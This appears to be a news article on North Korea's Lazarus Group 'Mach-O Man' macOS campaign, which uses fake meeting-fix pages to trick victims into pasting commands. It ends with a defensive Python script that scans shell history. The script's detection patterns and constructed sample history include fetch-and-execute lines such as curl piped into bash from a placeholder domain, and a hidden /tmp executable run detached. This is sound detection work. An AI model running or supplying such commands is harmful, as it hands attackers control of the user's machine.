North Korea’s state-run Lazarus Group is running a new campaign dubbed “Mach-O Man” that turns routine business communications into a direct route to credential theft and data loss, security experts warned Wednesday.
Natalie Newson, senior blockchain security researcher at CertiK, told CoinDesk on Wednesday that the group has committed an estimated $6.7 billion in cumulative heists since 2017, targeting fintech, cryptocurrency and other high-value executives and companies.
In the past two weeks alone, North Korean hackers have stolen over $500 million through the exploits of Drift and KelpDAO, in what appears to be an ongoing campaign. The crypto industry needs to start looking at Lazarus the way banks look at nation-state cyber actors: "as a persistent and well-funded threat, not just another news headline," she said.
“What’s especially dangerous about Lazarus right now is their level of activity,” Newson said. “KelpDAO, Drift, and now the new macOS malware toolkit, all emerged within the same month. This was not a random hack; this was a state-directed financial operation that operated at a scale and speed that is unique to institutions.”
North Korea has turned cryptocurrency theft into a lucrative national industry, and Mach-O Man is just the latest product in that process, she said. Although Lazarus created it, it is also used by other cybercriminal groups.
“This is a modular macOS malware toolkit created by the notorious Chollima division of the Lazarus Group. It uses native Mach-O binaries tailored for the Apple environment where crypto and fintech run,” she said.
Newson said Mach-O Man uses a delivery method called ClickFix. “It’s important to clarify this because a lot of reports confuse two different things,” she noted. ClickFix is not itself malware but a social engineering technique: the victim is shown a fake error, in this case a simulated connection problem, and is talked into pasting an attacker-supplied command into their own terminal, which is what actually fetches and runs the malicious payload.
Mauro Eldritch, a security expert and founder of threat intelligence firm BCA Ltd., said Lazarus works by sending “urgent” meeting invitations to executives via Telegram, inviting them to Zoom, Microsoft Teams or Google Meet calls.
The link leads to a fake but convincing website that instructs them to copy and paste a simple command into the macOS Terminal to “fix connection issues.” Running that command hands the attackers immediate access to the victim's machine and, through it, to company systems, SaaS platforms and financial resources. By the time victims discover they have been compromised, it is often too late.
Security threat researcher Vladimir S. said on X that there are many variations of this attack. In some cases, Lazarus attackers used the new malware after hijacking the domains of decentralized finance (DeFi) projects, replacing the projects' websites with fake Cloudflare verification pages that instruct visitors to run commands on their own machines.
“These fake ‘verification steps’ lead victims to run harmful commands via keyboard shortcuts,” said CertiK’s Newson. “The page looks authentic, the instructions look normal, and the victim initiates the action themselves — which is why traditional security controls often miss it.”
Most victims of this hack will not realize their security has been breached until the damage is done, at which point the malware has deleted itself.
“They probably don’t know it yet,” she said. “If they do, they may not be able to identify which variant affects them.”
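Because the victim types the command themselves, one of the few artifacts a ClickFix-style intrusion leaves on an otherwise cleaned-up Mac is the shell history entry. The script below is an added example written for this article, not code from CertiK, BCA Ltd. or any other party quoted here. It triages zsh-style history lines for the traits such lures tend to share (fetch-and-execute one-liners, base64 blobs piped into a shell, stripped quarantine attributes, hidden executables in /tmp, detached background processes). The indicators are generic heuristics, not indicators of compromise from the Mach-O Man campaign; the sample history is constructed, the lure domain uses the reserved .invalid TLD, and the allowlist prefix and indicator weights are assumptions to be tuned per organization.

```python
"""Triage macOS shell history for ClickFix-style "paste this into Terminal" lures.

Added example for this article, not code from CertiK, BCA or any vendor named in it.
Heuristics only: the actual commands used by the Mach-O Man campaign are not known here.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Heuristic indicators, each with an assumed weight (tune per organization).
INDICATORS: dict[str, tuple[int, re.Pattern]] = {
    # curl/wget output piped straight into a shell
    "remote_pipe_to_shell": (3, re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z|)sh\b")),
    # bash -c "$(curl ...)": the same shape as a legitimate installer one-liner
    "shell_exec_of_download": (3, re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b")),
    # base64-decoded blob handed to a shell
    "base64_decode_to_shell": (3, re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z|)sh\b")),
    # removing Gatekeeper's quarantine attribute (xattr -d com.apple.quarantine / xattr -c)
    "quarantine_strip": (2, re.compile(r"\bxattr\s+-\w*d\w*\s+com\.apple\.quarantine|\bxattr\s+-\w*c\w*\b")),
    # making a file in a temp or dot-prefixed location executable
    "hidden_temp_exec": (2, re.compile(r"\bchmod\s+\+?x\s+(/tmp|/var/tmp|/private/tmp|~?/\.)")),
    # AppleScript from the command line (fake dialogs, keystrokes, persistence)
    "applescript_exec": (1, re.compile(r"\bosascript\s+-e\b")),
    # detaching so the payload survives the Terminal window being closed
    "background_detach": (1, re.compile(r"\bnohup\b|\bdisown\b")),
}

URL_RX = re.compile(r"https?://([^\s\"'()|;&<>]+)")

# Assumed allowlist of fetch-and-execute installers the organization accepts.
ALLOWED_URL_PREFIXES = ("raw.githubusercontent.com/Homebrew/install/",)


@dataclass
class Finding:
    line_no: int
    command: str
    indicators: list[str]
    score: int
    allowlisted: bool


def analyze_command(line_no: int, command: str) -> Finding | None:
    """Return a Finding if the command carries any lure indicator, else None."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(command)]
    if not hits:
        return None
    urls = URL_RX.findall(command)
    # Allowlisted only if every URL on the line is a known-good installer; a line
    # with no URL at all (e.g. a local base64 blob) is never allowlisted.
    allowlisted = bool(urls) and all(u.startswith(ALLOWED_URL_PREFIXES) for u in urls)
    score = 0 if allowlisted else sum(INDICATORS[h][0] for h in hits)
    return Finding(line_no, command, hits, score, allowlisted)


def scan_history(lines) -> list[Finding]:
    """Scan history lines; zsh EXTENDED_HISTORY prefixes (': <ts>:<dur>;') are stripped."""
    findings = []
    for n, raw in enumerate(lines, start=1):
        cmd = re.sub(r"^: \d+:\d+;", "", raw).strip()
        if not cmd:
            continue
        f = analyze_command(n, cmd)
        if f:
            findings.append(f)
    return findings


# Constructed sample history for this example; nothing here is a real campaign artifact.
SAMPLE_HISTORY = [
    ": 1700000001:0;ls -la ~/Projects",
    ": 1700000002:0;git pull origin main",
    ': 1700000003:0;/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    ": 1700000004:0;curl -fsSL https://meet-example.invalid/fix-audio.sh | bash",
    ": 1700000005:0;echo aGVsbG8gd29ybGQK | base64 -D | sh",
    ": 1700000006:0;xattr -d com.apple.quarantine /tmp/.helper && chmod +x /tmp/.helper && nohup /tmp/.helper >/dev/null 2>&1 &",
    ": 1700000007:0;osascript -e 'display dialog \"Reconnecting to meeting...\"'",
]

if __name__ == "__main__":
    for f in sorted(scan_history(SAMPLE_HISTORY), key=lambda f: f.score, reverse=True):
        flag = " (allowlisted installer)" if f.allowlisted else ""
        print(f"line {f.line_no} score={f.score}{flag} {f.indicators}: {f.command}")
```

Shell history is a weak source on its own: a payload can truncate it, the victim may have used a different shell, and an allowlist keyed on URL prefixes can be fooled by a look-alike path. Where EDR or macOS unified-log process telemetry is available, run the same indicators over the recorded command lines of Terminal's child processes instead, and treat the Homebrew-shaped hit as a prompt to confirm the host rather than as proof of anything either way.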
